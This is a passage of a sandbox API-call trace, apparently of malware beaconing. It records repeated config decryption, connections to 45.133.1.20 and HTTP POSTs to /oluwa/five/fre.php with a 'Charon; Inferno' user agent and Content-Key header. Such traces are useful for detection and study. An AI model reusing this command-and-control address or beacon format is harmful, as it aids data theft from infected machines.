lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0234.525] GetProcessHeap () returned 0x6a0000 [0234.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0234.526] GetProcessHeap () returned 0x6a0000 [0234.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9b70 | out: hHeap=0x6a0000) returned 1 [0234.526] GetProcessHeap () returned 0x6a0000 [0234.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0234.527] closesocket (s=0x740) returned 0 [0234.528] GetProcessHeap () returned 0x6a0000 [0234.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0234.528] GetProcessHeap () returned 0x6a0000 [0234.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0234.529] GetProcessHeap () returned 0x6a0000 [0234.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0234.531] GetProcessHeap () returned 0x6a0000 [0234.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0234.532] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1474) returned 0x740 [0234.534] Sleep (dwMilliseconds=0xea60) [0234.551] GetProcessHeap () returned 0x6a0000 [0234.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0234.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.552] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0234.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.564] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0234.576] GetProcessHeap () returned 0x6a0000 [0234.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0234.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.577] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0234.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.579] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0234.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.580] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0234.591] GetProcessHeap () returned 0x6a0000 [0234.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0234.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.596] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0234.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.598] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0234.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.599] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0234.599] GetProcessHeap () returned 0x6a0000 [0234.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0234.600] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.601] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0234.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.602] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0234.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.606] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0234.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.608] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0234.608] GetProcessHeap () returned 0x6a0000 [0234.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0234.608] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0234.608] GetProcessHeap () returned 0x6a0000 [0234.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0234.609] GetProcessHeap () returned 0x6a0000 [0234.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0234.609] GetProcessHeap () returned 0x6a0000 [0234.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0234.609] GetProcessHeap () returned 0x6a0000 [0234.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0234.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.611] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0234.620] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.621] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0234.630] GetProcessHeap () returned 0x6a0000 [0234.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0234.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.631] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0234.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.633] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0234.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.634] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0234.634] GetProcessHeap () returned 0x6a0000 [0234.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0234.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.636] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0234.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.638] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0234.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.639] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0234.639] GetProcessHeap () returned 0x6a0000 [0234.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0234.640] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.640] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0234.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.642] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0234.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.643] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0234.644] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.644] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0234.644] GetProcessHeap () returned 0x6a0000 [0234.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0234.644] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0234.644] GetProcessHeap () returned 0x6a0000 [0234.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0234.645] socket (af=2, type=1, protocol=6) returned 0x744 [0234.645] connect (s=0x744, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0234.673] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0234.673] GetProcessHeap () returned 0x6a0000 [0234.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0234.673] GetProcessHeap () returned 0x6a0000 [0234.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6da6f0 [0234.674] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0234.675] wvsprintfA (in: param_1=0x6da6f0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0234.675] GetProcessHeap () returned 0x6a0000 [0234.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9e70 [0234.676] GetProcessHeap () returned 0x6a0000 [0234.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x6a0000) returned 1 [0234.676] GetProcessHeap () returned 0x6a0000 [0234.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0234.676] GetProcessHeap () returned 0x6a0000 [0234.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6da6f0 [0234.677] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0234.678] wvsprintfA (in: param_1=0x6da6f0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0234.678] GetProcessHeap () returned 0x6a0000 [0234.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0234.678] GetProcessHeap () returned 0x6a0000 [0234.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x6a0000) returned 1 [0234.679] send (s=0x744, buf=0x6bd460*, len=242, flags=0) returned 242 [0234.680] send (s=0x744, buf=0x6bb998*, len=159, flags=0) returned 159 [0234.680] GetProcessHeap () returned 0x6a0000 [0234.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0234.680] recv (in: s=0x744, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0234.791] GetProcessHeap () returned 0x6a0000 [0234.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0234.791] GetProcessHeap () returned 0x6a0000 [0234.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0234.792] GetProcessHeap () returned 0x6a0000 [0234.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9e70 | out: hHeap=0x6a0000) returned 1 [0234.792] GetProcessHeap () returned 0x6a0000 [0234.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0234.792] closesocket (s=0x744) returned 0 [0234.793] GetProcessHeap () returned 0x6a0000 [0234.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0234.793] GetProcessHeap () returned 0x6a0000 [0234.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0234.793] GetProcessHeap () returned 0x6a0000 [0234.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0234.794] GetProcessHeap () returned 0x6a0000 [0234.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0234.795] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1478) returned 0x744 [0234.798] Sleep (dwMilliseconds=0xea60) [0234.801] GetProcessHeap () returned 0x6a0000 [0234.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0234.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.804] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0234.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.813] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0234.832] GetProcessHeap () returned 0x6a0000 [0234.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0234.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.833] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0234.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.834] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0234.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.836] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0234.836] GetProcessHeap () returned 0x6a0000 [0234.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0234.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.837] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0234.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.838] CryptDestroyKey (hKey=0x6ad020) returned 1 [0234.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.840] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0234.840] GetProcessHeap () returned 0x6a0000 [0234.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0234.841] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.841] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0234.842] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.843] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0234.843] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.844] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0234.845] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.845] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0234.845] GetProcessHeap () returned 0x6a0000 [0234.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0234.845] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0234.845] GetProcessHeap () returned 0x6a0000 [0234.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0234.846] GetProcessHeap () returned 0x6a0000 [0234.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0234.846] GetProcessHeap () returned 0x6a0000 [0234.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0234.847] GetProcessHeap () returned 0x6a0000 [0234.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0234.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.848] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0234.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.855] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0234.863] GetProcessHeap () returned 0x6a0000 [0234.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0234.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.864] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0234.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.866] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0234.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.867] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0234.867] GetProcessHeap () returned 0x6a0000 [0234.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0234.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.869] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0234.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.870] CryptDestroyKey (hKey=0x6ad020) returned 1 [0234.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.871] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0234.871] GetProcessHeap () returned 0x6a0000 [0234.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0234.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.872] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0234.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.873] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0234.874] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.874] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0234.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.875] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0234.875] GetProcessHeap () returned 0x6a0000 [0234.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0234.875] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0234.875] GetProcessHeap () returned 0x6a0000 [0234.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0234.875] socket (af=2, type=1, protocol=6) returned 0x748 [0234.876] connect (s=0x748, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0234.902] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0234.902] GetProcessHeap () returned 0x6a0000 [0234.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0234.902] GetProcessHeap () returned 0x6a0000 [0234.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6da6f0 [0234.902] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0234.903] wvsprintfA (in: param_1=0x6da6f0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0234.904] GetProcessHeap () returned 0x6a0000 [0234.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9ab0 [0234.904] GetProcessHeap () returned 0x6a0000 [0234.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x6a0000) returned 1 [0234.904] GetProcessHeap () returned 0x6a0000 [0234.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0234.904] GetProcessHeap () returned 0x6a0000 [0234.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6da6f0 [0234.905] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0234.906] wvsprintfA (in: param_1=0x6da6f0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0234.906] GetProcessHeap () returned 0x6a0000 [0234.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0234.906] GetProcessHeap () returned 0x6a0000 [0234.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da6f0 | out: hHeap=0x6a0000) returned 1 [0234.906] send (s=0x748, buf=0x6bd460*, len=242, flags=0) returned 242 [0234.907] send (s=0x748, buf=0x6bb998*, len=159, flags=0) returned 159 [0234.907] GetProcessHeap () returned 0x6a0000 [0234.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0234.907] recv (in: s=0x748, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0234.978] GetProcessHeap () returned 0x6a0000 [0234.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0234.979] GetProcessHeap () returned 0x6a0000 [0234.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0234.980] GetProcessHeap () returned 0x6a0000 [0234.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9ab0 | out: hHeap=0x6a0000) returned 1 [0234.980] GetProcessHeap () returned 0x6a0000 [0234.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0234.981] closesocket (s=0x748) returned 0 [0234.982] GetProcessHeap () returned 0x6a0000 [0234.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0234.982] GetProcessHeap () returned 0x6a0000 [0234.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 